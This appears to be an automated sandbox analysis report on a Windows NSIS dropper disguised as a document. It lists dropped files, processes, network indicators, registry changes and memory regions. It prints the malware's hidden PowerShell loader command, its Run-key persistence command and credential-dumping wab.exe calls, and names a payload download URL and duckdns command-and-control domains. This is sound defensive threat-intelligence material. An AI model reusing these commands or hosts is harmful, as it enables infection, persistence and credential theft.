Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Evgh. rvs Armenia. 30.04.2024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten\Evgh. rvs Armenia. 30.04.2024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro
|
ASCII text, with very long lines (60984), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\mqerms.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten\Evgh. rvs Armenia. 30.04.2024.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten\hektowattens.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\chatrum.sag
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Hypopharynx\Udbuler\Eomecon\Boligtilsynet\Insipidly.Stu
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqnwc0p3.zna.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv5zgcj3.4dh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv9CF8.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\gyjlretajhvbzkpgzfenpklwvjfw
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\Documents\Illoyalitet.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe
|
"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes%
($Nonconjecturably)"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gyjlretajhvbzkpgzfenpklwvjfw"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbovkwdcxqngjydkiqrgaxffwqwfffq"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bvuokpowlyflmeroabeidcawfegogqpwfc"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle
minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
learfo55ozj01.duckdns.org
|
|||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
http://geoplugin.net/json.gpd
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
https://covid19support.top/OXdwhUAIa249.bin
|
172.67.220.6
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://login.li
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
https://covid19support.top/$5
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://crl.micro-
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
https://covid19support.top/
|
unknown
|
||
http://crl.micro
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://aka.ms/pscore6lBjq
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
https://covid19support.top/OXdwhUAIa249.biny
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://www.imvu.comata
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
learfo55ozj02.duckdns.org
|
193.222.96.21
|
||
learfo55ozj01.duckdns.org
|
192.169.69.26
|
||
covid19support.top
|
172.67.220.6
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.169.69.26
|
learfo55ozj01.duckdns.org
|
United States
|
||
193.222.96.21
|
learfo55ozj02.duckdns.org
|
Germany
|
||
172.67.220.6
|
covid19support.top
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Divan180
|
culturize
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{BD84B380-8CA2-1069-AB1D-08000948F534} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@fontext.dll,-8007
|
||
HKEY_CURRENT_USER\SOFTWARE\Betvingelse
|
fataliteter
|
||
HKEY_CURRENT_USER\Nausea
|
Wryer
|
||
HKEY_CURRENT_USER\Environment
|
Ufuldbaarnes
|
||
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
time
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
9CB6000
|
direct allocation
|
page execute and read and write
|
||
7B04000
|
heap
|
page read and write
|
||
37F0000
|
trusted library allocation
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
7AD9000
|
heap
|
page read and write
|
||
3319000
|
heap
|
page read and write
|
||
2313E000
|
stack
|
page read and write
|
||
335B000
|
heap
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
3335000
|
heap
|
page read and write
|
||
652000
|
heap
|
page read and write
|
||
337A000
|
heap
|
page read and write
|
||
335B000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
331E000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
346D000
|
heap
|
page read and write
|
||
239AA000
|
heap
|
page read and write
|
||
4D48000
|
trusted library allocation
|
page read and write
|
||
7C20000
|
direct allocation
|
page read and write
|
||
333E000
|
heap
|
page read and write
|
||
22DDC000
|
stack
|
page read and write
|
||
3C60000
|
remote allocation
|
page execute and read and write
|
||
3321000
|
heap
|
page read and write
|
||
2DDE000
|
stack
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
332E000
|
heap
|
page read and write
|
||
3368000
|
heap
|
page read and write
|
||
7B60000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
2B17000
|
stack
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
2FBD000
|
heap
|
page read and write
|
||
5F5000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
233FF000
|
stack
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
5E9000
|
heap
|
page read and write
|
||
23EB0000
|
unclassified section
|
page execute and read and write
|
||
648000
|
heap
|
page read and write
|
||
2F40000
|
direct allocation
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
7B0E000
|
heap
|
page read and write
|
||
237E4000
|
heap
|
page read and write
|
||
7B60000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
7BA0000
|
direct allocation
|
page read and write
|
||
646000
|
heap
|
page read and write
|
||
2BCE000
|
heap
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
3470000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
60E000
|
heap
|
page read and write
|
||
2E7F000
|
stack
|
page read and write
|
||
3470000
|
heap
|
page read and write
|
||
237F4000
|
heap
|
page read and write
|
||
7B49000
|
heap
|
page read and write
|
||
2EA8000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
32F0000
|
heap
|
page read and write
|
||
31AC000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
48E0000
|
trusted library allocation
|
page read and write
|
||
332E000
|
heap
|
page read and write
|
||
23F23000
|
unclassified section
|
page execute and read and write
|
||
332D000
|
heap
|
page read and write
|
||
3398000
|
heap
|
page read and write
|
||
7A40000
|
heap
|
page readonly
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
4925000
|
trusted library allocation
|
page execute and read and write
|
||
2DE0000
|
heap
|
page readonly
|
||
5E5000
|
heap
|
page read and write
|
||
650000
|
heap
|
page read and write
|
||
2BA0000
|
heap
|
page read and write
|
||
4766000
|
remote allocation
|
page execute and read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
7C50000
|
direct allocation
|
page read and write
|
||
2B3C000
|
stack
|
page read and write
|
||
236E000
|
stack
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
A98000
|
heap
|
page read and write
|
||
83D7000
|
stack
|
page read and write
|
||
3378000
|
heap
|
page read and write
|
||
346E000
|
heap
|
page read and write
|
||
88EE000
|
heap
|
page read and write
|
||
335A000
|
heap
|
page read and write
|
||
613000
|
heap
|
page read and write
|
||
3325000
|
heap
|
page read and write
|
||
331F000
|
heap
|
page read and write
|
||
30C3000
|
heap
|
page read and write
|
||
7A60000
|
direct allocation
|
page read and write
|
||
2905000
|
heap
|
page read and write
|
||
621000
|
heap
|
page read and write
|
||
235BD000
|
stack
|
page read and write
|
||
3341000
|
heap
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
8400000
|
trusted library allocation
|
page read and write
|
||
2D9F000
|
unkown
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
7A9D000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
237F4000
|
heap
|
page read and write
|
||
8590000
|
trusted library allocation
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
A6B6000
|
direct allocation
|
page execute and read and write
|
||
3344000
|
heap
|
page read and write
|
||
237A4000
|
heap
|
page read and write
|
||
5F4000
|
heap
|
page read and write
|
||
332E000
|
heap
|
page read and write
|
||
7B5A000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
5E9000
|
heap
|
page read and write
|
||
7A78000
|
heap
|
page read and write
|
||
5A8000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
48F4000
|
trusted library allocation
|
page read and write
|
||
2BB0000
|
heap
|
page readonly
|
||
2EB5000
|
heap
|
page read and write
|
||
23711000
|
heap
|
page read and write
|
||
70D000
|
stack
|
page read and write
|
||
8AA0000
|
direct allocation
|
page execute and read and write
|
||
2229000
|
heap
|
page read and write
|
||
4E5E000
|
stack
|
page read and write
|
||
232F000
|
stack
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
332E000
|
heap
|
page read and write
|
||
96F000
|
stack
|
page read and write
|
||
701F000
|
stack
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
230E0000
|
direct allocation
|
page read and write
|
||
7B90000
|
direct allocation
|
page read and write
|
||
622000
|
heap
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
651000
|
heap
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
4FE1000
|
trusted library allocation
|
page read and write
|
||
61B000
|
heap
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
7B56000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
2384000
|
heap
|
page read and write
|
||
3328000
|
heap
|
page read and write
|
||
2BAB000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
2EFE000
|
stack
|
page read and write
|
||
237F2000
|
heap
|
page read and write
|
||
7B5D000
|
heap
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
237A3000
|
heap
|
page read and write
|
||
332E000
|
heap
|
page read and write
|
||
7703000
|
heap
|
page read and write
|
||
474000
|
unkown
|
page readonly
|
||
2B14000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
23AB0000
|
heap
|
page read and write
|
||
7BF0000
|
direct allocation
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
521F000
|
stack
|
page read and write
|
||
3385000
|
heap
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
5E9000
|
heap
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
23788000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
3008000
|
heap
|
page read and write
|
||
5645000
|
heap
|
page read and write
|
||
8A50000
|
trusted library allocation
|
page execute and read and write
|
||
3385000
|
heap
|
page read and write
|
||
5F1000
|
heap
|
page read and write
|
||
48F3000
|
trusted library allocation
|
page execute and read and write
|
||
7B53000
|
heap
|
page read and write
|
||
437000
|
unkown
|
page readonly
|
||
4910000
|
trusted library allocation
|
page read and write
|
||
237D3000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
28D3000
|
heap
|
page read and write
|
||
231CE000
|
stack
|
page read and write
|
||
337E000
|
heap
|
page read and write
|
||
230C0000
|
direct allocation
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
7B60000
|
heap
|
page read and write
|
||
8874000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
4F55000
|
heap
|
page execute and read and write
|
||
2B8E000
|
stack
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
7B5B000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
2F40000
|
heap
|
page read and write
|
||
3321000
|
heap
|
page read and write
|
||
67C000
|
heap
|
page read and write
|
||
5E9000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
214E000
|
stack
|
page read and write
|
||
23260000
|
remote allocation
|
page read and write
|
||
5CC000
|
heap
|
page read and write
|
||
2E4E000
|
stack
|
page read and write
|
||
2B10000
|
heap
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
22E5E000
|
stack
|
page read and write
|
||
2BA0000
|
heap
|
page read and write
|
||
5136000
|
trusted library allocation
|
page read and write
|
||
66C000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
3385000
|
heap
|
page read and write
|
||
2E30000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
4D9C000
|
stack
|
page read and write
|
||
237F2000
|
heap
|
page read and write
|
||
7B60000
|
heap
|
page read and write
|
||
8899000
|
heap
|
page read and write
|
||
535F000
|
stack
|
page read and write
|
||
7572000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3333000
|
heap
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page readonly
|
||
239DA000
|
heap
|
page read and write
|
||
2EDE000
|
stack
|
page read and write
|
||
77E000
|
stack
|
page read and write
|
||
531F000
|
stack
|
page read and write
|
||
C4B6000
|
direct allocation
|
page execute and read and write
|
||
3311000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2B14000
|
heap
|
page read and write
|
||
7B49000
|
heap
|
page read and write
|
||
8570000
|
trusted library allocation
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
4FE000
|
stack
|
page read and write
|
||
8A70000
|
heap
|
page read and write
|
||
8550000
|
trusted library allocation
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
2301F000
|
stack
|
page read and write
|
||
48D0000
|
trusted library section
|
page read and write
|
||
3333000
|
heap
|
page read and write
|
||
8580000
|
trusted library allocation
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
88D2000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
335B000
|
heap
|
page read and write
|
||
3335000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
7940000
|
trusted library allocation
|
page read and write
|
||
2EA0000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
2BFE000
|
stack
|
page read and write
|
||
8A90000
|
trusted library allocation
|
page execute and read and write
|
||
2AFC000
|
stack
|
page read and write
|
||
2C80000
|
heap
|
page read and write
|
||
688000
|
heap
|
page read and write
|
||
7080000
|
direct allocation
|
page read and write
|
||
5546000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
23711000
|
heap
|
page read and write
|
||
2357E000
|
stack
|
page read and write
|
||
437000
|
unkown
|
page readonly
|
||
3311000
|
heap
|
page read and write
|
||
562D000
|
trusted library allocation
|
page read and write
|
||
334B000
|
heap
|
page read and write
|
||
618D000
|
trusted library allocation
|
page read and write
|
||
3318000
|
heap
|
page read and write
|
||
334E000
|
heap
|
page read and write
|
||
2B34000
|
stack
|
page read and write
|
||
273E000
|
stack
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
2EC0000
|
trusted library allocation
|
page read and write
|
||
540E000
|
heap
|
page read and write
|
||
92B6000
|
direct allocation
|
page execute and read and write
|
||
5D9000
|
heap
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
3319000
|
heap
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
22E1D000
|
stack
|
page read and write
|
||
234FE000
|
stack
|
page read and write
|
||
22FDE000
|
stack
|
page read and write
|
||
5290000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
617000
|
heap
|
page read and write
|
||
2ADF000
|
unkown
|
page read and write
|
||
4FCE000
|
stack
|
page read and write
|
||
222C000
|
heap
|
page read and write
|
||
8560000
|
trusted library allocation
|
page read and write
|
||
4900000
|
trusted library allocation
|
page read and write
|
||
4FD0000
|
heap
|
page execute and read and write
|
||
7B01000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
3331000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
7799000
|
heap
|
page read and write
|
||
31EF000
|
stack
|
page read and write
|
||
3344000
|
heap
|
page read and write
|
||
5633000
|
trusted library allocation
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
7B60000
|
heap
|
page read and write
|
||
3442000
|
heap
|
page read and write
|
||
3333000
|
heap
|
page read and write
|
||
2F50000
|
direct allocation
|
page read and write
|
||
7C40000
|
direct allocation
|
page read and write
|
||
886C000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
498E000
|
stack
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
407000
|
unkown
|
page readonly
|
||
23F0D000
|
unclassified section
|
page execute and read and write
|
||
788E000
|
stack
|
page read and write
|
||
4E9E000
|
stack
|
page read and write
|
||
7C90000
|
heap
|
page read and write
|
||
23788000
|
heap
|
page read and write
|
||
2F90000
|
direct allocation
|
page read and write
|
||
23630000
|
unclassified section
|
page execute and read and write
|
||
28EB000
|
heap
|
page read and write
|
||
7B49000
|
heap
|
page read and write
|
||
3339000
|
heap
|
page read and write
|
||
2ABA000
|
stack
|
page read and write
|
||
4909000
|
trusted library allocation
|
page read and write
|
||
48F0000
|
trusted library allocation
|
page read and write
|
||
7B60000
|
heap
|
page read and write
|
||
23676000
|
direct allocation
|
page execute and read and write
|
||
3331000
|
heap
|
page read and write
|
||
48FD000
|
trusted library allocation
|
page execute and read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
4DDD000
|
stack
|
page read and write
|
||
3333000
|
heap
|
page read and write
|
||
2ED000
|
stack
|
page read and write
|
||
4FC7000
|
trusted library allocation
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
4922000
|
trusted library allocation
|
page read and write
|
||
53E000
|
stack
|
page read and write
|
||
2F70000
|
direct allocation
|
page read and write
|
||
2F10000
|
direct allocation
|
page read and write
|
||
31EE000
|
stack
|
page read and write
|
||
4F50000
|
heap
|
page read and write
|
||
335A000
|
heap
|
page read and write
|
||
6188000
|
trusted library allocation
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
2364B000
|
unclassified section
|
page execute and read and write
|
||
7BC0000
|
direct allocation
|
page read and write
|
||
5F4000
|
heap
|
page read and write
|
||
434000
|
unkown
|
page readonly
|
||
2B14000
|
heap
|
page read and write
|
||
619000
|
heap
|
page read and write
|
||
334B000
|
heap
|
page read and write
|
||
3398000
|
heap
|
page read and write
|
||
4CA0000
|
heap
|
page read and write
|
||
2B79000
|
stack
|
page read and write
|
||
9A57000
|
trusted library allocation
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
3327000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
7950000
|
trusted library allocation
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
601000
|
heap
|
page read and write
|
||
6174000
|
trusted library allocation
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3354000
|
heap
|
page read and write
|
||
332B000
|
heap
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
3440000
|
heap
|
page read and write
|
||
3325000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
88BA000
|
heap
|
page read and write
|
||
23F86000
|
unclassified section
|
page execute and read and write
|
||
28DB000
|
heap
|
page read and write
|
||
7B5B000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
674000
|
heap
|
page read and write
|
||
84D0000
|
trusted library allocation
|
page execute and read and write
|
||
3311000
|
heap
|
page read and write
|
||
8500000
|
heap
|
page read and write
|
||
3326000
|
heap
|
page read and write
|
||
76E7000
|
heap
|
page read and write
|
||
84BE000
|
stack
|
page read and write
|
||
232F0000
|
heap
|
page read and write
|
||
3D66000
|
remote allocation
|
page execute and read and write
|
||
2B14000
|
heap
|
page read and write
|
||
79B0000
|
trusted library allocation
|
page read and write
|
||
237A4000
|
heap
|
page read and write
|
||
282E000
|
stack
|
page read and write
|
||
5D9000
|
heap
|
page read and write
|
||
23AB1000
|
heap
|
page read and write
|
||
7CA0000
|
heap
|
page read and write
|
||
23811000
|
heap
|
page read and write
|
||
28E0000
|
heap
|
page read and write
|
||
64F000
|
heap
|
page read and write
|
||
337A000
|
heap
|
page read and write
|
||
730000
|
heap
|
page read and write
|
||
3378000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
7790000
|
heap
|
page read and write
|
||
2F60000
|
direct allocation
|
page read and write
|
||
3540000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
2347E000
|
stack
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
3590000
|
heap
|
page read and write
|
||
5F8000
|
heap
|
page read and write
|
||
342F000
|
stack
|
page read and write
|
||
424000
|
unkown
|
page read and write
|
||
2329E000
|
stack
|
page read and write
|
||
5766000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
23A1A000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
78AE000
|
stack
|
page read and write
|
||
7B0E000
|
heap
|
page read and write
|
||
23260000
|
remote allocation
|
page read and write
|
||
4F8E000
|
stack
|
page read and write
|
||
2397C000
|
heap
|
page read and write
|
||
76B0000
|
heap
|
page read and write
|
||
86F000
|
stack
|
page read and write
|
||
5F4000
|
heap
|
page read and write
|
||
870C000
|
stack
|
page read and write
|
||
88FA000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
5FE1000
|
trusted library allocation
|
page read and write
|
||
49CE000
|
stack
|
page read and write
|
||
7970000
|
trusted library allocation
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
2B1C000
|
stack
|
page read and write
|
||
27ED000
|
stack
|
page read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
3301000
|
heap
|
page read and write
|
||
6049000
|
trusted library allocation
|
page read and write
|
||
554D000
|
heap
|
page read and write
|
||
3333000
|
heap
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
23260000
|
remote allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
5B66000
|
remote allocation
|
page execute and read and write
|
||
4E19000
|
heap
|
page read and write
|
||
2320F000
|
stack
|
page read and write
|
||
3398000
|
heap
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
8410000
|
trusted library allocation
|
page read and write
|
||
76CB000
|
heap
|
page read and write
|
||
3ED000
|
stack
|
page read and write
|
||
2BB8000
|
heap
|
page read and write
|
||
500E000
|
stack
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
342E000
|
heap
|
page read and write
|
||
3378000
|
heap
|
page read and write
|
||
23788000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
575E000
|
heap
|
page read and write
|
||
7770000
|
heap
|
page read and write
|
||
7C30000
|
direct allocation
|
page read and write
|
||
5532000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
23AB1000
|
heap
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
77E000
|
unkown
|
page read and write
|
||
3378000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
23661000
|
direct allocation
|
page execute and read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
7D30000
|
heap
|
page read and write
|
||
237A3000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
8A80000
|
trusted library allocation
|
page read and write
|
||
BAB6000
|
direct allocation
|
page execute and read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
65A000
|
heap
|
page read and write
|
||
23788000
|
heap
|
page read and write
|
||
2C9C000
|
stack
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
77B0000
|
trusted library allocation
|
page read and write
|
||
7660000
|
heap
|
page execute and read and write
|
||
5368000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
7B59000
|
heap
|
page read and write
|
||
49E0000
|
trusted library allocation
|
page execute and read and write
|
||
7AF3000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
